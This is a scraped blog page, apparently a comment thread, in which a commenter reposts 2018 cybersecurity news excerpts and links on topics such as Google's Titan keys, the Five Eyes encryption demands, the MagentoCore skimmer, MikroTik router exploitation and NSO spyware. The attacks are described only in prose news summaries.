Joseph Cox / Motherboard:
Google confirms its Titan Security Keys are made by a Chinese company, but says the firmware ensures security, as security experts call for more transparency
Google’s Titan Security Keys, used to lock down accounts, are produced in China. Several experts want more answers on that supply chain process, for fears of tampering or security issues.
Doctors and scientists say microwave strikes may have caused sonic delusions and very real brain damage among embassy staff and family members.
During the Cold War, Washington feared that Moscow was seeking to turn microwave radiation into covert weapons of mind control.
More recently, the American military itself sought to develop microwave arms that could invisibly beam painfully loud booms and even spoken words into people’s heads. The aims were to disable attackers and wage psychological warfare.
Now, doctors and scientists say such unconventional weapons may have caused the baffling symptoms and ailments that, starting in late 2016, hit more than three dozen American diplomats and family members in Cuba and China.
Reuters:
US counter-intelligence chief says China’s spy services are aggressively using fake LinkedIn accounts to target US government workers for recruitment
The United States’ top spy catcher said Chinese espionage agencies are using fake LinkedIn accounts to try to recruit Americans with access to government and commercial secrets, and the company should shut them down.
He said the Chinese campaign includes contacting thousands of LinkedIn members at a time, but he declined to say how many fake accounts U.S. intelligence had discovered, how many Americans may have been contacted and how much success China has had in the recruitment drive.
A rather persistent bug in the takedown code of a major reporting agency has caused an embarrassing situation for several Hollywood studios. For quite some time now, companies including Sony Pictures Television and Columbia Pictures have been inadvertently asking Google to remove the IMDb listings of their own work.
Every single day, largely automated bots scour the web for references to pirated content.
These links are then reported to various online services, such as Google, requesting the operators to remove the allegedly infringing content.
This works fine, most of the time. But, in common with their human counterparts, these bots aren’t perfect.
In a series of bizarre takedown requests, a DMCA takedown outfit is inadvertently going after a wide variety of legitimate sites. Some requests specifically target news about the EU upload filters, or censorship machines, as they are sometimes called. As a result, one article from EU MEP Julia Reda was wiped from Google’s search results.
Linus Torvalds thinks Intel has gotten better about keeping the Linux open-source community in the loop with CPU security problems, but it started out really badly. And it’s still not fair that Linux has to fix hardware problems.
At The Linux Foundation’s Open Source Summit North America in Vancouver, Linus Torvalds, Linux’s creator, and Dirk Hohndel, VMware VP and chief open source officer, had a wide-ranging conversation about Linux security, open-source developer, and quantum computing.
Torvalds would really like his work to get back to being boring. It hasn’t been lately because of Intel’s CPU Meltdown and Spectre security bugs. The root cause behind these security holes was speculative execution.
In speculative execution, when a program does a calculation, which might go several ways, the processor assumes several results and works on them. If it’s wrong, it goes back to the beginning and restarts with the correct data. Because CPUs are so fast these days, it’s much quicker to do this than to have the hardware sit idle waiting for data.
Torvalds “loves speculative execution. CPUs must do this.” But, Torvalds is annoyed that “people didn’t think about the problems of taking shortcuts with speculative execution. We knew speculative work that wasn’t used had to be thrown away.” It wasn’t. That problem is now baked in most modern processors. The long-term fix is a new generation of Intel CPUs.
At some point this fall, a team of researchers from MIT’s CSAIL and UC Berkeley’s EECS aim to deliver an initial version of an open source, formally verified, secure hardware enclave based on RISC-V architecture called Keystone.
“From a security community perspective, having trustworthy secure enclaves is really important for building secure systems,” said Dawn Song, a professor of computer science at UC Berkeley and founder and CEO of Oasis Labs, in a phone interview with The Register. “You can say it’s one of the holy grails in computer security.”
Keystone is an open-source project for building trusted execution environments (TEE) with secure hardware enclaves, based on the RISC-V architecture. Our goal is to build a secure and trustworthy open-source secure hardware enclave, accessible to everyone in industry and academia.
SMBs faced an average of five breaches in the last year – but employees feel their companies are covering these up
Almost one in four IT decision makers in small and medium-sized businesses (SMBs) across the UK believe successful cyber attacks are being covered-up by their own companies – a problem given under GDPR they should be reported.
Trust is even worse in companies numbering between 50 and 99 employees in particular, as just over half of IT leaders, 51%, feel their companies have kept secret at least one successful cyber attack in the last 12 months.
According to research commissioned by Appstractor Corporation, SMBs in the UK on average faced at least five cyber threats in the last year, with 19% of companies facing as many as ten attacks. This was as many as 20 for 2% of firms, while every respondent said their firm faced at least one cyber attack during this period.
Fewer than half of IT bosses, feel their cyber security software has managed to keep up with the complexities of the threats they face – with a third of believing this puts their firms at a higher risk than big business counterparts.
Rebecca Hill / The Register:
Communiqué from Five Eyes nations tells tech industry to make accommodations on encryption, or legislative or enforcement actions may be taken for lawful access — Five Eyes to tech: We have ways of making you comply — The Five Eyes nations have told the tech industry …
The Five Eyes nations have told the tech industry to help spy agencies by creating lawful access solutions to encrypted services – and warned that governments can always legislate if they don’t.
The UK, US, Canada, Australia and New Zealand – which have a long-standing intelligence agreement – met in Australia this week.
In an official communiqué on the confab, they claim that their inability to lawfully access encrypted content risks undermining democratic justice systems – and issue a veiled warning to industry.
The group is careful to avoid previous criticisms about their desire for backdoors and so-called magic thinking – saying that they have “no interest or intention to weaken encryption mechanisms” – and emphasise the importance of privacy laws.
“Privacy laws must prevent arbitrary or unlawful interference, but privacy is not absolute,” the document stated.
The problem the Five Eyes have is that the principles that allow government agencies to search homes or personal effects don’t give them the ability to use the content of encrypted data.
The principles set out in the Five Eyes’ statement seek to stress that law enforcement’s inability to access the content of “lawfully obtained data” is the responsibility of everyone.
“Law enforcement agencies in our countries need technology providers to assist with the execution of lawful orders,” the group said.
The United States’ top spy catcher said Chinese espionage agencies are using fake LinkedIn accounts to try to recruit Americans with access to government and commercial secrets, and the company should shut them down.
Philips evaluated one of its products and discovered that it was vulnerable to nine different security bugs, one of them of critical severity.
An advisory from the Industrial Controls Systems Cyber Emergency Response Team (ICS-CERT) on Thursday describes the vulnerabilities in Philips e-Alert Unit, warning that the device is exploitable remotely if exposed to the internet, or from the local network.
The horde of security flaws affects versions R2.1 and earlier of the product. Their severity ratings range from medium, for exposing information about the operating system and software components, to critical, for hardcoded credentials.
The e-Alert Unit from Philips is a solution that monitors the performance of medical imaging systems. It is not a medical device in itself but it alerts when key parameters on MRI machines are amiss.
This week a new CryptoJoker ransomware variant was discovered called CryptoNar that has infected victims. The good news, is that a free decryptor was quickly released so that these victims can get their files back for free.
A Dutch security researcher has lifted the veil on a massive website hacking campaign that has infected 7,339 Magento stores with a script that collects payment card data from people shopping on the sites.
The script is what industry experts call a “payment card scraper” or “skimmer.” Hackers breach sites and modify their source code to load the script along with its legitimate files.
The script usually loads on store checkout pages and secretly records payment card details entered in payment forms, data that it later sends to a server under the hacker’s control.
MagentoCore —the most fertile payment skimmer to date
According to de Groot, this is “the most successful to date.”
The researcher says he found the script —which he named MagentoCore— on 7,339 Magento stores in the past six months.
“The average recovery time is a few weeks, but at least 1450 stores have hosted the MagentoCore.net parasite during the full past 6 months,” de Groot says. “New brands are hijacked at a pace of 50 to 60 stores per day.”
A quick PublicWWW search reveals that the MagentoCore script can still be found on 5,172 domains today, at the time of writing.
MagentoCore operated by one of the three MageCart groups
In new spear-phishing campaigns observed this month, the Cobalt hacking group targeted banks in Russia and Romania with emails containing two payloads pointing to two different command and control servers.
Cobalt is a cybercrime gang that operates since at least 2016 specialized in targeting financial organizations. According to data from Europol, the group is tied to cyberattacks against at least 100 banks across the world, stealing about one billion euros from them.
Although the alleged ringleader has been arrested in Spain this year, and three individuals believed to be members of the hacking crew have been charged at the beginning of the month, the group continues to operate.
Phishing email uses domain similar to financial organization
New York Times:
In lawsuits against Israeli hacking tools maker NSO Group, which claims to not spy with its tools, court docs allegedly show it snooping on calls to close sales
The rulers of the United Arab Emirates had been using Israeli spyware for more than a year, secretly turning the smartphones of dissidents at home or rivals abroad into surveillance devices.
So when top Emirati officials were offered a pricey update of the spying technology, they wanted to make sure it worked, according to leaked emails submitted Thursday in two lawsuits against the spyware’s maker, the Israel-based NSO Group.
Could the company secretly record the phones of the emir of Qatar, a regional rival, the Emiratis asked? How about the phone of a powerful Saudi prince who directed the kingdom’s national guard? Or what about recording the phone of the editor of a London-based Arab newspaper?
“Please find two recordings attached,” a company representative wrote back four days later, according to the emails.
The NSO Group’s actions are now at the heart of the twin lawsuits accusing the company of actively participating in illegal spying — part of a global effort to confront the growing arms race in the world of spyware.
As private companies develop and sell cutting-edge surveillance technology to governments for tens of millions of dollars, human rights groups say the scant oversight over the practice invites rampant misuse.
Rebecca Hill / The Register:
Communiqué from Five Eyes nations tells tech industry to make accommodations on encryption, or legislative or enforcement actions may be taken for lawful access — Five Eyes to tech: We have ways of making you comply — The Five Eyes nations have told the tech industry … https://www.theregister.co.uk/2018/08/31/five_eyes_2018_meeting_encryption_terrorist_content/
A pact of five nation states dedicated to a global “collect it all” surveillance mission has issued a memo calling on their governments to demand tech companies build backdoor access to their users’ encrypted data — or face measures to force companies to comply
The rulers of the United Arab Emirates had been using Israeli spyware for more than a year, secretly turning the smartphones of dissidents at home or rivals abroad into surveillance devices.
So when top Emirati officials were offered a pricey update of the spying technology, they wanted to make sure it worked, according to leaked emails submitted Thursday in two lawsuits against the spyware’s maker, the Israel-based NSO Group.
Could the company secretly record the phones of the emir of Qatar, a regional rival, the Emiratis asked?
A 20-year-old from Vancouver, Washington was indicted last week on federal hacking charges and for allegedly operating the “Satori” botnet, a malware strain unleashed last year that infected hundreds of thousands of wireless routers and other “Internet of Things” (IoT) devices. This outcome is hardly surprising given that the accused’s alleged alter ego has been relentless in seeking media attention for this global crime machine.
“Despite the havoc he supposedly wreaked, the accused hacker doesn’t seem to have been terribly knowledgeable about hacking,” Poulsen notes.
Schuchman reportedly went by the handle “Nexus Zeta,” the nickname used by a fairly inexperienced and clumsy ne’er-do-well who has tried on multiple occasions to get KrebsOnSecurity to write about the Satori botnet. In January 2018, Nexus Zeta changed the login page for his botnet control panel that he used to remotely control his hacked routers to include a friendly backhanded reference to this author
Nexus Zeta clearly had limited hacking skills initially and almost no operational security. Indeed, his efforts to gain notoriety for his illegal hacking activities eventually earned him just that, as it usually does.
Last July, in Google’s Sunnyvale offices, a hacker found a way to trick doors into opening without the requisite RFID keycard. Luckily for Google, it was David Tomaschik, an employee at the tech giant, who only had good intentions.
When he sent his malicious code across the Google network, he saw the lights turn from red to green on the door to his office. Then came the satisfying thunk as the lock opened. It was the culmination of work in which Tomaschik had uncovered vulnerabilities in technology made by Software House, the creator of the office controllers managing the physical security of the California site.
Last summer, when Tomaschik looked at the encrypted messages the Software House devices (called iStar Ultra and IP-ACM) were sending across the Google network, he discovered they were non-random; encrypted messages should always look random if they’re properly protected. He was intrigued and digging deeper discovered a “hardcoded” encryption key was used by all Software House devices. That meant he could effectively replicate the key and forge commands, such as those asking a door to unlock. Or he could simply replay legitimate unlocking commands, which had much the same effect.
Tomaschik also discovered he could do all this without any record of his actions. And he could prevent legitimate Google employees from opening doors. “Once I had my findings it became a priority. It was pretty bad,” he told Forbes. Google then moved quickly to prevent attacks on its offices, according to Tomaschik.
A flight from Oakland to Maui was delayed about 90 minutes because of a fake crime-scene photo. And because that apparently wasn’t enough airplane drama for one morning, the crew had to declare an emergency while airborne because pepper spray filled the cabin.
Hawaiian Airlines Flight 23 was originally set to take off Friday morning and was already taxiing when multiple passengers alerted the crew that they had received a horrifying photo of what appeared to be a dead child facedown in a crime scene with numerical markers.
At least 15 passengers were sent the gruesome photo
It turned out that the photo came from a 15-year-old girl who was trying to send an image from her high school medical-biology class to her mother, who was sitting next to her, but accidentally AirDropped the photo to the other passengers around her. AirDrop allows the instant transfer of files among supported Apple devices, like iPhones and iPads, as long as the option is turned on. The “dead” child in the image was actually a mannequin.
“She was telling her mom about the class, and her mom supposedly just got a new iPhone,” Kelly said. “People were a little alarmed by it.”
The girl and her mother were not allowed to continue on the flight and were rebooked on a flight Saturday, Kelly said. They were questioned by officers from the Alameda County Sheriff’s Office, who determined that there was no actual crime.
Cybercriminals Have Been Experimenting With a Blockchain Domain Name System (DNS)
The takedowns of AlphaBay and Hansa in 2017 by law enforcement gave rise to much speculation about the future of dark web marketplaces. As I’ve discussed before, an environment of fear and mistrust are driving the cybercriminal community to incorporate alternative technologies to improve security and remain below the radar as they conduct illicit business online. One such technology is blockchain.
When most people hear the term “blockchain” they typically think of cryptocurrencies and other applications where transactions and interactions among a community of users must be executed with a high degree of trust, efficiency and transparency. However, if we consider the recent challenges that administrators of online criminal forums have encountered, it only makes sense that they would explore applications for blockchain. To that end, some have been experimenting with a blockchain domain name system (DNS) as a way of hiding their malicious activity and bullet-proofing their offerings.
A blockchain DNS is different from a traditional DNS. Typically, when we type a website into an Internet browser, a computer will query a DNS server for an IP address. Essentially, this is the Internet equivalent of a phone book.
Decentralized DNS offers many benefits such as countering censorship by authorities (for example if a government orders all Internet Service Providers in a country to stop redirecting domains to a relevant IP address), or preventing DNS spoofing, where attackers can insert corrupt DNS data so that the name server returns an incorrect IP address and redirects traffic to an attacker computer. However, decentralized DNS can also be abused by attackers for malicious purposes. As blockchain domains do not have a central authority and registrations contain unique encrypted hashes rather than an individual’s name and address, it is harder for law enforcement to perform site takedowns. The following are just a few examples of bad actors using blockchain.
Back in January 2016, one of the first groups to employ blockchain DNS to create a .bazar domain in an attempt to better secure their operations was a group known as The Money Team. In July 2017, the Joker’s Stash, a popular Automated Vending Cart (AVC) site used to purchase stolen payment card details, began using blockchain DNS alongside its established Tor (.onion) domain.
Blockchain technology has also allowed users to realize alternative models for online marketplaces. The site known as Tralfamadore, for example, uses blockchain as its back-end to store the necessary databases and code to support front-end user interfaces.
As cybersecurity professionals, we should continue to monitor for an uptick in the adoption of blockchain for the buying and selling of illicit goods. And while we’re at it, we should also continue to assess other emerging technologies that could be used for nefarious purposes.
A critical remote code execution vulnerability was recently addressed in packagist.org, a large PHP package repository, a security researcher reveals.
An open source project, Packagist is the default package server behind Composer, a tool for dependency management in PHP, as it aggregates public PHP packages installable with the utility. The packagist.org site helps users search for packages and lets Composer know where to get the code from.
A recent case filed in federal court, in which an American woman had her iPhone seized and cracked by Customs and Border Protection in a New Jersey airport puts a whole new spin on the things we now need to worry about when leaving the country. It appears that now everyone’s phones, despite country of origin or cause, are subject to nonconsensual seizure and search — even if we refuse to give up our passwords.
If you’re not caught up on the story, news hit this week that a Staten Island mom coming home from a February trip with her 9-year-old daughter from Switzerland had her iPhone snatched, kept for months and accessed for no given reason.
Cryptojacking, the hijacking of computing resources to mine cryptocurrency, turns out to be both relatively widespread and not particularly profitable, according to a paper published by code boffins from Braunschweig University of Technology in Germany.
In a paper distributed via ArXiv, researchers Marius Musch, Christian Wressnegger, Martin Johns, and Konrad Rieck analyzed the prevalence of cryptomining on websites and found that 1 out of every 500 of the top million Alexa-ranked sites hosts cryptojacking code.
Where cryptocurrencies like Bitcoin depend on CPU cycles for solving the computational puzzles that generate currency, cryptocurrencies like Monero, Bytecoin, and Electroneum rely on memory resources. Commodity hardware can’t compete with GPUs and ASICs in the computation of Bitcoin hashes, but it can help churn out memory-bound calculations.
Google’s new $50 Titan Security Key adds extra security to your account, and helps protect Facebook, Dropbox and other services, too, as long as you don’t lose it. CNBC’s Todd Haselton puts it to the test.
Google’s new $50 Titan Security Key adds extra security to your account, and helps protect Facebook, Dropbox and other services from phishing attacks… as long as you don’t lose it.
“We have had no reported or confirmed account takeovers since implementing security keys at Google,” a spokesperson told TechCrunch.
And it’s probably true. Think of a security key as like a two-factor authentication code that’s sent to your phone — but instead a USB stick in your pocket. Two-factor authentication is stronger than just a username and password, but text message codes can be intercepted and many sites and services don’t yet support the stronger authenticator codes.
Google on Thursday began selling a new piece of hardware called the Titan security key, which is designed to add another layer of protection for online security. But the company has faced criticism for producing the key in China through a partnership with manufacturer Feitian, according to a report from CNBC.
The product is labeled as being “Produced in China,” meaning, like many consumer electronics, that the security key is manufactured there. Some security experts, such as Adam Meyers at the security firm CloudStrike who was interviewed by the Information, say that having production overseas leaves Google open to infiltration by hackers or even the Chinese government during the assembly process.
Internet-connected 3D printers are at risk of being tampered with or even sabotaged because users fail to apply security controls, a researcher has warned.
Xavier Mertens, a senior handler for the SANS Internet Storm Center (ISC) and freelance cybersecurity consultant, found more than 3,700 3D printers directly connected to the internet.
“These printers are controlled using the open source software package ‘OctoPrint’ but it’s likely there are other tools that are similarly affected. OctoPrint is not meant to be exposed in this way, and it explains in its documentation how to deploy the software in a safe way,” Mertens explained.
many OctoPrint instances are not properly configured and do not enforce authentication,
attacker would be able to download the files that describe parts being printed.
An attacker would also be able to swap out these files, replacing them with files that describe similar parts that are “weakened” to produce substandard or unsafe parts.
The problem here is users going out of their way to expose internal services on the public net.
“There’s no way to prevent people from exposing internal services on the net. I try to educate, I’m working on yet another prominent warning, but I can’t force people to perform proper (and inconvenient) network security.”
some printers do not have safety switches to prevent them from overheating, which means an attacker could attempt to start a fire by uploading a malicious file.
Each RouterBOARD device runs the RouterOS software system.[1]
According to WikiLeaks, the CIA Vault7 hacking tool Chimay Red involves 2 exploits, including Winbox Any Directory File Read (CVE-2018-14847) and Webfig Remote Code Execution Vulnerability.[2]
Both Winbox and Webfig are RouterOS management components
Since Mid-July, our Anglerfish Honeypot System has been picking up malware exploiting the above MikroTik CVE-2018-14847 vulnerability to perform various malicious activities.
What’s more, we have observed massive number of victims having their Socks4 proxy enabled on the device by one single malicious actor.
More interestingly, we also discovered that more than 7,500+ victims are being actively eavesdropped, with their traffic being forwarded to IPs controlled by unknown attackers.
Vulnerable Devices
From our own scan result, we logged more than 5,000K devices with open TCP/8291 port, and 1,200k of them were identified as Mikrotik devices, within which 370k (30.83%) are CVE-2018-14847 vulnerable.
The Attacks
CoinHive Mining Code Injection
Sock4 Proxy and the Mysterious 95.154.216.128/25
Eavesdropping
Suggestions
We recommend that MikroTik RouterOS users update the software system in a timely manner, and check whether the http proxy, Socks4 proxy and network traffic capture function are being maliciously exploited by attackers.
Copyright owners will need more if they want a successful legal case
Why it matters: Judge rules that copyright trolls need more than just an IP address if they want to go after copyright infringement. An IP is not enough proof to tie a person to a crime.
Wall Street Journal:
Wall Street Journal survey: after the Atlanta ransomware attack, a majority of the 25 largest US cities have or are looking to buy cybersecurity insurance
Researchers at Lancaster University have use an active acoustic side-channel attack to steal smartphone passwords for the first time.
On Thursday, a group of researchers from Lancaster University posted a paper to arXiv that demonstrates how they used a smartphone’s microphone and speaker system to steal the device’s unlock pattern.
Although the average person doesn’t have to worry about getting hacked this way any time soon, the researchers are the first to demonstrate that this kind of attack is even possible. According to the researchers, their “SonarSnoop” attack decreases the number of unlock patterns an attacker must try by 70 percent and can be performed without the victim ever knowing they’re being hacked.
SonarSnoop exploits secondary information that will also reveal the password—in this case, the acoustic signature from entering the password on the device.
“SonarSnoop is applicable in any environment where microphones and speakers can interact.”
The attack begins when a user unwittingly installs a malicious application on their phone. When a user downloads the infected app, their phone begins broadcasting a sound signal that is just above the human range of hearing. This sound signal is reflected by every object around the phone, creating an echo. This echo is then recorded by the phone’s microphone.
By calculating the time between the emission of the sound and the return of its echo to the source, it is possible to determine the location of an object in a given space and whether that object is moving—this is known as sonar.
A 24-year-old murder suspect was sentenced to 14 months in prison on Friday for refusing to hand over his Facebook account password to detectives who are investigating the death of 13-year-old schoolgirl Lucy McHugh.
Stephen Nicholson, a friend of the family who’d been staying with them, was allegedly in contact with Lucy the morning of her disappearance. Police took him into custody and asked him – twice – for his password so they could check out the alleged conversation and whatever other content might help the investigation.
Nicholson has been jailed not for the murder, but for his refusal to cooperate with the detectives and let them into his account.
On Friday, he pleaded guilty to failing to disclose access codes to an electronic device under the Regulation of Investigatory Powers Act 2000 (RIPA).
According to the Independent, Nicholson argued that giving police access to his private Facebook messages could expose information relating to cannabis.
The judge scoffed, describing the excuse as “wholly inadequate”, considering the severity of the case.
Privacy and human rights organizations expressed concern Tuesday after a coalition of intelligence agencies renewed a call for technology companies to allow so-called “backdoor” access to encrypted content and devices.
The reaction came following a weekend statement from the “Five Eyes” intelligence agencies calling on “industry partners” to provide a way for law enforcement to access encrypted content that may not be available even with a search warrant.
The call by the agencies from the United States, Britain, Canada, Australia and New Zealand threatens to reignite a long-simmering debate on encryption.
Android device details are being exposed to running applications via Wi-Fi broadcasts in the mobile operating system, Nightwatch Cybersecurity has discovered.
The exposed information includes the WiFi network name, BSSID, local IP addresses, DNS server information, and the MAC address. Normally, extra permissions are required to access such details, but Wi-Fi broadcasts allow all applications to capture the information, thus bypassing existing mitigations.
Furthermore, Nightwatch Cybersecurity’s researchers argue that the MAC address, which is tied to the hardware, can be used to “uniquely identify and track any Android device.” Information such as network name and BSSID allow for the geolocation of users, while other information can be leveraged for other attacks.
Tracked as CVE-2018-9489, the vulnerability was addressed in the recently released Android 9, but previous platform iterations continue to be impacted, ths security firm says. Thus, all devices running under those OS versions, including forks such as Amazon’s FireOS for the Kindle, are believed to be vulnerable.
This year’s mobile-focused Pwn2Own hacking competition organized by Trend Micro’s Zero Day Initiative (ZDI) will include a new category for Internet of Things (IoT) devices.
The event, whose name has been changed from Mobile Pwn2Own to Pwn2Own Tokyo as a result of the expansion, will take place alongside the PacSec security conference in Tokyo, Japan, on November 13 – 14.
Hackers can earn over $500,000 in cash and prizes if they manage to find and exploit vulnerabilities in devices from Google, Apple, Samsung, Huawei, Xiaomi, Amazon and Nest.
In the new IoT category, contestants can earn up to $60,000 if they can execute arbitrary code without user interaction on Apple Watch Series 3, Amazon Echo (2nd generation), Google Home, Nest Cam IQ Indoor and Amazon Cloud Cam devices.
One day late last year, Qatari newspaper editor Abdullah Al-Athbah came home, removed the SIM card from his iPhone 7 and smashed it to pieces with a hammer.
A source had just handed Al-Athbah a cache of emails suggesting that his phone had been targeted by hacking software made by Israel’s NSO Group. He told The Associated Press he considered the phone compromised.
“I feared that someone could get back into it,” he said in an interview Friday. “I needed to protect my sources.”
Google last week took the wraps off Tink, an open source, multi-language, cross-platform cryptographic library designed to help simplify common encryption operations.
Under development for the past two years, the cryptographic library has been available on GitHub since its early days and has already attracted a few external contributors.
Now at version 1.2.0 and with support for cloud, Android, iOS, and more, the library is already being used to secure data of Google products such as AdMob, Google Pay, Google Assistant, Firebase, the Android Search App, and others.
Built on top of existing libraries such as BoringSSL and Java Cryptography Architecture, Tink also includes a series of countermeasures that aim at mitigating weaknesses that Google’s Project Wycheproof discovered in those libraries.
Dutch security researcher Willem de Groot, who’s particularly interested in security problems on online payment sites, recently wrote about a long-running Magento malware campaign.
Magento is to ecommerce what WordPress is to blogging – you can run the open source version on your own servers; you can use an ecommerce partner who’ll run a Magento instance for you; or you can sign up for Magento’s own cloud platform.
Thousands of sites still run their own Magento servers, even in the modern cloud-centric era, for example because they’ve already got a customised warehousing and shipping system with which their ecommerce servers need to integrate.
Unfortunately, de Groot found that many of these sites – more than 7000 in total, he claims – have been infiltrated by cybercrooks in the past six months.
Worse still, de Groot estimates that nearly 1500 of them may have been infected for the entire six-month period.
The Wayback Machine’s archive of webpages is legitimate evidence that may be used in litigation, a US appeals court has decided.
The second circuit ruling [PDF] supports a similar one from the third circuit – and, taken together, the decisions could pave the way for the Internet Archive’s library of webpages to be considered evidence for countless future trials.
The second circuit, based in New York, was asked over the summer to review an appeal by an Italian computer hacker in which he sought to exclude screenshots of websites run by him that tied him to a virus and botnet he was ultimately convicted over. Prosecutors had taken screenshots of his webpages from the Internet Archive and used them as trial evidence – and he wanted the files thrown out.
Fabio Gasperini argued that the presented Wayback Machine archives of his webpages were not adequately authenticated as legit and untampered, and so shouldn’t have been included in his criminal trial.
In the Gasperini case, however, the second circuit noted that the prosecution had included testimony from the Internet Archive’s office manager, “who explained how the Archive captures and preserves evidence of the contents of the internet at a given time.”
The Wayback Machine works by crawling over the web with bots that automatically fetch as many pages as they can find and store it all in a searchable public database, effectively snapshotting the world’s websites on a given day. For instance, if you want to see what The Register looked like in 1998, go right ahead.
The manager also testified that the prosecution’s screenshots of the Wayback Machine’s archive of Gasperini’s webpages really did match the contents of the Internet Archive
We use cookies to ensure that we give you the best experience on our website. If you continue to use this site we will assume that you are happy with it.
We are a professional review site that has advertisement and can receive compensation from the companies whose products we review. We use affiliate links in the post so if you use them to buy products through those links we can get compensation at no additional cost to you.OkDecline
493 Comments
Tomi Engdahl says:
Joseph Cox / Motherboard:
Google confirms its Titan Security Keys are made by a Chinese company, but says the firmware ensures security, as security experts call for more transparency
Experts Call for Transparency Around Google’s Chinese-Made Security Keys
https://motherboard.vice.com/en_us/article/mb4zy3/transparency-google-titan-security-keys-china
Google’s Titan Security Keys, used to lock down accounts, are produced in China. Several experts want more answers on that supply chain process, for fears of tampering or security issues.
Tomi Engdahl says:
It seems that tinfoil hat wearing people had some point:
Microwave Weapons Are Prime Suspect in Ills of U.S. Embassy Workers
https://www.nytimes.com/2018/09/01/science/sonic-attack-cuba-microwave.html
Doctors and scientists say microwave strikes may have caused sonic delusions and very real brain damage among embassy staff and family members.
During the Cold War, Washington feared that Moscow was seeking to turn microwave radiation into covert weapons of mind control.
More recently, the American military itself sought to develop microwave arms that could invisibly beam painfully loud booms and even spoken words into people’s heads. The aims were to disable attackers and wage psychological warfare.
Now, doctors and scientists say such unconventional weapons may have caused the baffling symptoms and ailments that, starting in late 2016, hit more than three dozen American diplomats and family members in Cuba and China.
Tomi Engdahl says:
Reuters:
US counter-intelligence chief says China’s spy services are aggressively using fake LinkedIn accounts to target US government workers for recruitment
Exclusive: U.S. accuses China of ‘super aggressive’ spy campaign on LinkedIn
https://www.reuters.com/article/us-linkedin-china-espionage-exclusive/exclusive-chief-u-s-spy-catcher-says-china-using-linkedin-to-recruit-americans-idUSKCN1LG15Y
The United States’ top spy catcher said Chinese espionage agencies are using fake LinkedIn accounts to try to recruit Americans with access to government and commercial secrets, and the company should shut them down.
He said the Chinese campaign includes contacting thousands of LinkedIn members at a time, but he declined to say how many fake accounts U.S. intelligence had discovered, how many Americans may have been contacted and how much success China has had in the recruitment drive.
Tomi Engdahl says:
Vindu Goel / New York Times:
Indian regulators call for European-style rules on big tech, focused on privacy and protecting local firms from competition; sources say new rules are coming
https://www.nytimes.com/2018/08/31/technology/india-technology-american-giants.html
Tomi Engdahl says:
This is Google’s Titan security key
https://techcrunch.com/2018/08/30/this-is-googles-titan-security-key/
Tomi Engdahl says:
Hollywood Studios Flag Their IMDb Listings as “Pirate” Links
https://torrentfreak.com/hollywood-studios-flag-their-imdb-listings-as-pirate-links-180818/
A rather persistent bug in the takedown code of a major reporting agency has caused an embarrassing situation for several Hollywood studios. For quite some time now, companies including Sony Pictures Television and Columbia Pictures have been inadvertently asking Google to remove the IMDb listings of their own work.
Every single day, largely automated bots scour the web for references to pirated content.
These links are then reported to various online services, such as Google, requesting the operators to remove the allegedly infringing content.
This works fine, most of the time. But, in common with their human counterparts, these bots aren’t perfect.
None of these takedown tools are perfect.
Tomi Engdahl says:
Bizarre DMCA Takedown Requests Censor EU ‘Censorship’ News
By Ernesto on August 11, 2018
https://torrentfreak.com/bizarre-dmca-takedown-requests-censor-eu-censorship-news-181011/
In a series of bizarre takedown requests, a DMCA takedown outfit is inadvertently going after a wide variety of legitimate sites. Some requests specifically target news about the EU upload filters, or censorship machines, as they are sometimes called. As a result, one article from EU MEP Julia Reda was wiped from Google’s search results.
Tomi Engdahl says:
Linus Torvalds talks frankly about Intel security bugs
https://www.zdnet.com/article/linus-torvalds-talks-frankly-about-intel-security-bugs/
Linus Torvalds thinks Intel has gotten better about keeping the Linux open-source community in the loop with CPU security problems, but it started out really badly. And it’s still not fair that Linux has to fix hardware problems.
At The Linux Foundation’s Open Source Summit North America in Vancouver, Linus Torvalds, Linux’s creator, and Dirk Hohndel, VMware VP and chief open source officer, had a wide-ranging conversation about Linux security, open-source developer, and quantum computing.
Torvalds would really like his work to get back to being boring. It hasn’t been lately because of Intel’s CPU Meltdown and Spectre security bugs. The root cause behind these security holes was speculative execution.
In speculative execution, when a program does a calculation, which might go several ways, the processor assumes several results and works on them. If it’s wrong, it goes back to the beginning and restarts with the correct data. Because CPUs are so fast these days, it’s much quicker to do this than to have the hardware sit idle waiting for data.
Torvalds “loves speculative execution. CPUs must do this.” But, Torvalds is annoyed that “people didn’t think about the problems of taking shortcuts with speculative execution. We knew speculative work that wasn’t used had to be thrown away.” It wasn’t. That problem is now baked in most modern processors. The long-term fix is a new generation of Intel CPUs.
Tomi Engdahl says:
Boffins trying to build a open source secure enclave on RISC-V
Open source trusted execution component expected this fall
https://www.theregister.co.uk/2018/08/31/keystone_secure_enclave/
At some point this fall, a team of researchers from MIT’s CSAIL and UC Berkeley’s EECS aim to deliver an initial version of an open source, formally verified, secure hardware enclave based on RISC-V architecture called Keystone.
“From a security community perspective, having trustworthy secure enclaves is really important for building secure systems,” said Dawn Song, a professor of computer science at UC Berkeley and founder and CEO of Oasis Labs, in a phone interview with The Register. “You can say it’s one of the holy grails in computer security.”
Keystone
Open-source Secure Hardware Enclave
https://keystone-enclave.org/
Keystone is an open-source project for building trusted execution environments (TEE) with secure hardware enclaves, based on the RISC-V architecture. Our goal is to build a secure and trustworthy open-source secure hardware enclave, accessible to everyone in industry and academia.
Tomi Engdahl says:
IT staff believe their own companies are keeping cyber attacks secret
http://www.itpro.co.uk/security/31815/it-staff-believe-their-own-companies-are-keeping-cyber-attacks-secret
SMBs faced an average of five breaches in the last year – but employees feel their companies are covering these up
Almost one in four IT decision makers in small and medium-sized businesses (SMBs) across the UK believe successful cyber attacks are being covered-up by their own companies – a problem given under GDPR they should be reported.
Trust is even worse in companies numbering between 50 and 99 employees in particular, as just over half of IT leaders, 51%, feel their companies have kept secret at least one successful cyber attack in the last 12 months.
According to research commissioned by Appstractor Corporation, SMBs in the UK on average faced at least five cyber threats in the last year, with 19% of companies facing as many as ten attacks. This was as many as 20 for 2% of firms, while every respondent said their firm faced at least one cyber attack during this period.
Fewer than half of IT bosses, feel their cyber security software has managed to keep up with the complexities of the threats they face – with a third of believing this puts their firms at a higher risk than big business counterparts.
https://www.appstractor.com/privatise/small-business-cyber-security-statistics
Tomi Engdahl says:
CCleaner update offers improved privacy controls, renames elements to stop users freaking out, adds bundleware
https://betanews.com/2018/08/30/ccleaner-improved-privacy/
Tomi Engdahl says:
http://www.cloudtacker.com/content/cisco-7-password-decryptor-deobfuscator-decoder
Tomi Engdahl says:
Rebecca Hill / The Register:
